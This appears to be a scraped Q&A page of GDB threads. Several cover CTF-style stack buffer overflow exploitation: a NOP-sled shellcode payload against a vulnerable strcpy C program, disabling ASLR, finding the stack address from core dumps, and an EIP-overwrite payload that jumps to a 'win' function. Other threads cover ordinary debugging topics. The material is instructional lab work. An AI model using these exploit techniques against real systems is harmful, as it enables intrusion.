Differences in environment layout with and without GDB - gdb

Recently I have been working on CTF challenges that require the attacker to stage shellcode in the environment. With ASLR disabled, one can rely on only slight differences between the environment of the shell, for example, and that of the exploitable process (e.g. differences due only to binary name differences). However, GDB (and R2) will make slight changes to the environment that make this very hard to do due to the environment variables shifting around slightly when not being debugged.
For example, GDB seems to at least add the environment variables LINES and COLUMNS. However, these can be removed by invoking GDB as follows:
gdb -ex 'set exec-wrapper env -u LINES -u COLUMNS' -ex 'r < exploit.input' challenge.bin
Note that GDB will implicitly use the fully qualified path when debugging a binary, so the user can further decrease any differences by invoking the binary in a similar manner.
`pwd`/challenge.bin < exploit.input
However, there still appear to be some differences. I have many times been able to get an exploit working while in GDB, but only to have it crash when run without the debugger. I've read mention of some script (sometimes referred to as setenv.sh) that can (allegedly) be used to setup an environment exactly like GDB, but I have not been able to find it.
Looking at the env of the shell:
LANG=en_US.UTF-8
PROFILEHOME=
DISPLAY=:0
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
TERM=xterm-256color
SHELL=/bin/bash
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
XDG_SEAT=seat0
SHLVL=4
COLORFGBG=15;0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
_=/usr/bin/env
And comparing it to that of GDG (LINES and COLUMNS removed):
/test/challenge.bin
_=/usr/bin/gdb
LANG=en_US.UTF-8
DISPLAY=:0
PROFILEHOME=
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
SHELL=/bin/bash
TERM=xterm-256color
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
COLORFGBG=15;0
SHLVL=4
XDG_SEAT=seat0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
/test/challenge.bin
One can see the environments are not very different on inspection. Notably, the GDB env seems to have a second instance of the debugged binary's name (e.g. challenge.bin, in this case), as well as the fact that it sets _ to GDB rather than the debugged binary. The offsets seem to be way off, even when taking these small changes into account.
TL;DR
How can the GDB environment differences be nulled out for the case when it is necessary to know a priori the locations of things in the environment with and without the debugger running?
In an effort of lazyness, has anyone fully characterized the with/without GDB environment, or the changes GDB makes?
And for those interested, R2 appears to made changes to PATH. There may also be other differences.

How can the GDB environment differences be nulled out
One way is to run the binary outside of GDB (have the binary wait for GDB to attach, as described here), and attach GDB to it from "outside".
Update:
the binary in question is part of a challenge and source is not provided
You can patch _start with a jmp _start (so the binary will never progress past the first instruction). Once attached, replace the jmp with the original instruction, and start debugging.
Update 2:
Are you familiar with a better process?
In order to find offset of a given function in the ELF file, you need two values: offset of the function within section, and offset of section within the file.
For example:
$ readelf -Ws a.out | grep ' _start'
58: 00000000004003b0 43 FUNC GLOBAL DEFAULT 11 _start
This tells you that _start is linked at 0x4003b0 in section 11.
What is that section, what is its starting address, and where in the file does it start?
$ readelf -WS a.out | grep '\[11\]'
[11] .text PROGBITS 00000000004003b0 0003b0 000151 00 AX 0 0 16
We now see that _start is at the very start of .text (this is usually the case), and that .text starts at offset 0x3b0 in the file. QED.
An even better process is to use GDB to perfom the patching (GDB will perform all the finding of offsets). Suppose I want to overwrite the first instruction of _start with 0xCC instruction:
$ gdb --write -q ./a.out
Reading symbols from ./a.out...done.
Let's look at the original instructions first:
(gdb) x/4i _start
0x4003b0 <_start>: xor %ebp,%ebp
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
0x4003b6 <_start+6>: mov %rsp,%rdx
Now let's patch the first one:
(gdb) set *(char*)0x4003b0 = 0xCC
(gdb) x/4i _start
0x4003b0 <_start>: int3
0x4003b1 <_start+1>: in (%dx),%eax
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
(gdb) quit
Segmentation fault (core dumped) <<-- this is a GDB bug. I should fix it some day.
$ objdump -d a.out
...
Disassembly of section .text:
00000000004003b0 <_start>:
4003b0: cc int3 <<-- success!
4003b1: ed in (%dx),%eax
4003b2: 49 89 d1 mov %rdx,%r9
...
Voila!

Related

reverse engineering (stack-smash) how to find out the address of the stack where the data that I entered into the program is written in the stack

So, my English is very bad, but I will try to explain my problem clearly(sorry about that).
I have a program in the С programming language:
#include <stdio.h>
#include <string.h>
void vuln_func(char *data) {
char buff[256];
strcpy(buff, data);
}
void main(int argc, char *argv[]) {
vuln_func(argv[1]);
}
The program accepts any line for input. I want to enter a payload into it, which will create a TEST directory in the directory from which this program is launched.
How it works:
I run a program in the debugger with a string containing the payload:
(gdb) r $(python -c 'print "\x90" * 233 + "\x31\xc0\x50\x68\x54\x45\x53\x54\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x59\xee\xff\xbf"')
In the payload, first there are 233 "nop" instructions, then the shellcode that creates the "TEST" directory, then the address to which the program should go when it reaches the "ret" instruction
Part of the program code in the form of instructions in the debugger:
(gdb) disas vuln_func
Dump of assembler code for function vuln_func:
0x0804840b <+0>: push ebp
0x0804840c <+1>: mov ebp,esp
0x0804840e <+3>: sub esp,0x108
0x08048414 <+9>: sub esp,0x8
0x08048417 <+12>: push DWORD PTR [ebp+0x8]
0x0804841a <+15>: lea eax,[ebp-0x108]
0x08048420 <+21>: push eax
0x08048421 <+22>: call 0x80482e0 <strcpy#plt>
0x08048426 <+27>: add esp,0x10
0x08048429 <+30>: nop
0x0804842a <+31>: leave
0x0804842b <+32>: ret
End of assembler dump.
So, the "strcpy" function puts the string that we entered into the program on the stack.
Then a couple more instructions are executed. When the program reaches the "ret" instruction, the return address is on the stack. By default, it points to the address in the "main" function. I want it to point to my payload located on the stack. When the program is executed through the debugger, I can see where the return address lies in the stack and calculate the required number of "nop" instructions before the payload and the value of the desired return address. But what to do when I want to execute a program without a debugger. How do I find out where my shell code is in the stack?
I tried using the same return address that I used in the payload via the debugger, but my ubuntu system reports the error "Segmentation fault (core dumped)" . That is, the return address does not correspond to the real address space of the stack, which is allocated for this program when running through the ubuntu terminal.
update: I looked at the core dump of this program. Every time I run it through the terminal, the stack address changes a lot. Here are a few stack addresses where my shell code was located:
0xbfda4161
0xbfc89161
0xbf944161
Why does the stack address change so much if I have already disabled the dynamic address space?
The value of the esp register on entry into main depends on the environment variables and the size of the argv[n] strings (in addition to being randomized by the kernel, which you've turned off).
I suspect that in your case the difference is caused by argv[0], which GDB tends to resolve to the full pathname of the binary.
You didn't tell us how you invoke the vulnerable binary outside of GDB. If you do something like ./vuln $(python -c ...) or vuln $(python -c ...), try running it as $(realpath ./vuln) $(python -c ...) instead -- that should match what happens in GDB.
I solved the proble.
Firstly, I didn't think about the fact that the ASLR shutdown setting is disabled every time I log out.
How to do:
Disable ASLR. For ubuntu 16, I used the following command: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
View the core dump data. I did it using the "coredumpctl" utility.
First I looked at the list of fallen programs: coredumpctl list, found the process number for my program in it.
Then went under the debugger: coredumpctl gdb your_proc_pid.
In the debugger, I looked at the stack address using: (gdb) info stack, found where my payload lies in the stack: x/90xw 0xstack_address.
I changed the address in my payload, now the program does not break when running in the terminal.

GDB qemu "Cannot access memory at address..."

I have a simple program that I am using to test a python riscv disassembler I am making and I want to use gdb/qemu to test my work. The program is this literally just this:
int main(int argc, char *argv[]) {
while (1);
return 0;
}
this is the command I am using to start gdb:
gdb-multiarch ./test -ex "target remote :7224" -ex "tbreak main:4" -ex "continue"
This is what was used to compile it:
riscv64-linux-gnu-gcc -o test test.c
But I am getting this error when I try to change any memory values:
(gdb) disassemble
Dump of assembler code for function main:
0x00000040000005ea <+0>: addi sp,sp,-32
=> 0x00000040000005ec <+2>: sd s0,24(sp)
0x00000040000005ee <+4>: addi s0,sp,32
0x00000040000005f0 <+6>: mv a5,a0
0x00000040000005f2 <+8>: sd a1,-32(s0)
0x00000040000005f6 <+12>: sw a5,-20(s0)
0x00000040000005fa <+16>: j 0x40000005fa <main+16>
End of assembler dump.
(gdb) set *(int*) $pc = 0x2e325f43
Cannot access memory at address 0x40000005ec
I just want to see what instruction gdb interprets with the bytes I set. Google has been little to no help with this. What could I be doing wrong?
Figured it out in a stupid manner.
set $pc = $sp
Then I can change the pc
This command:
set *(int*) $pc = 0x2e325f43
is trying to write a value to the memory the PC currently points at (that's 0x00000040000005ec in this case). As it happens, that memory is read-only, which is pretty usual for areas of memory with code in them[*]. So gdb tells you it can't write there. You should be able to write to memory which isn't read-only.
[*] With a suitable linker map you can create binaries which have the code in writeable memory. But the default for Linux executables is that code segments are read-only.
Your other command:
set $pc = $sp
changes the PC; it sets it to whatever the stack pointer is pointing at. That's going to be fatal for any further attempts to execute code, unless you put some code there, of course. As it happens, the stack is generally writeable, which is why writing to the memory pointed to by the PC then works.

How to generate payload with python for buffer overflow?

I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
This is what I get
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
Notice those last characters! I know that it's not what I was suppose to get. The address I wish to run on EIP register is 0804863b. I had to put this on little endian for the exploit to run properly. Any comments on this?
If you run this payload:
python -c 'print "A"*112 + "B"*4' > attack_payload
And then if you have the control of the PC (EIP=42424242)
(gdb) r < attack_payload
You can replace the "BBBB" with your address 0804863b
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
It is all, you should verify before if you have the EIP control.
More info (I see the source code), in a simple way (for a better explanation) try to compile with the following command
gcc -o main main.c -fno-stack-protector -g -m32
Run it with the debugger (gdb ./main) and set the following breakpoint
gef➤ b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
Continue and insert the following payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Go on at the instruction
→ 0x804862d <stringLength+60> ret
And you can see that now you have the control of the ret value
gef➤ bt
#0 0x0804862d in stringLength () at main.c:14
#1 0x43434343 in ?? ()
#2 0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤ x/x $sp
0xffffd5ec: 0x43434343
Now you can replace "CCCC" with the address of the win function
gef➤ p win
$1 = {void ()} 0x80485dd <win>
You can automatize all with a simple python script (try to see this library pwntools), you payload will be:
payload = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
payload += "\xdd\x85\x04\x08"
Or also you can run
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main

How to get line number from libunwind and AddressSanitizer listed as <shared object>+offset?

I often get stack traces from libunwind or AddressSanitizer like this:
#12 0x7ffff4b47063 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1f5063)
#13 0x7ffff4b2c783 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1da783)
#14 0x7ffff4b2cca4 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1daca4)
#15 0x7ffff4b2cf42 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1daf42)
I know that if I have gdb attached to the still living process, I can use this to get details
on the location:
(gdb) list *0x7ffff4b47063
But if the process has died, I can not just restart it under gdb and use the above because
address randomization makes that I get the wrong result (at least, that is my assumption;
I clearly do not get meaningful locations). So, I tried
% gdb program
% run
<get to the place everything is loaded and type Control-C>
(gdb) info shared
<Dumps mapping location of shared objects>
(gdb) list *(<base of libswipl.so.7.1.13>+0x1f5063)
But, this either lists nothing or clearly the wrong location. This sounds simple, but
I failed to find the answer :-( Platform is 64-bit Linux, but I guess this applies to
any platform.
(gdb) info shared
<Dumps mapping location of shared objects>
Unfortunately, above does not dump actual mapping location that is usable with this:
libswipl.so.7.1.13+0x1f5063
(as you've discovered). Rather, GDB output lists where the .text section was mapped, not where the ELF binary itself was mapped.
You can adjust for .text offset by finding it in
readelf -WS libswipl.so.7.1.13 | grep '\.text'
It might be easier to use addr2line instead. Something like
addr2line -fe libswipl.so.7.1.13 0x1f5063 0x1da783
should work.
Please see http://clang.llvm.org/docs/AddressSanitizer.html for the instructions on using the asan_symbolize.py script and/or the symbolize=true option.

View Both Assembly and C code

Do we have a way to view assembly and c code both using gdb.
disassemble function_name shows only assembly, I was trying to find a way to easliy map c code to assembly.
Thanks
You can run gdb in Text User Interface (TUI) mode:
gdb -tui <your-binary>
(gdb) b main
(gdb) r
(gdb) layout split
The layout split command divides the window into two parts - one of them displaying the source code, the other one the corresponding assembly.
A few others tricks:
set disassembly-flavor intel - if your prefer intel notation
set print asm-demangle - demangles C++ names in assembly view
ni - next instruction
si - step instruction
If you do not want to use the TUI mode (e.g. your terminal does not like it), you can always do:
x /12i $pc
which means print 12 instructions from current program counter address - this also works with the tricks above (demangling, stepping instructions, etc.).
The "x /12i $pc" trick works in both gdb and cgdb, whereas "layout split" only works in gdb.
Enjoy :)
Try disassemble /m.
Refer to http://sourceware.org/gdb/current/onlinedocs/gdb/Machine-Code.html#Machine-Code
The format is similar to that of objdump -S, and intermixes source with disassembly. Sample output excerpt:
10 int i = 0;
=> 0x0000000000400536 <+9>: movl $0x0,-0x14(%rbp)
11 while (1) {
12 i++;
0x000000000040053d <+16>: addl $0x1,-0x14(%rbp)
For your purpose, try
objdump -S <your_object_file>
from man objdump:
-S
--source
Display source code intermixed with disassembly, if possible.
Implies -d.
The fastest way to obtain this is to press the key combination ctrl-x 2 after launching gdb.
This will give you immediately a split window with source code and assembly in Text User Interface Mode (described in accepted answer).
Just another tooltip: keyboard arrows in this mode are used for navigate up and down through the source code, to use them to access commands history you can use ctrl-x o that will refocus on gdb shell window.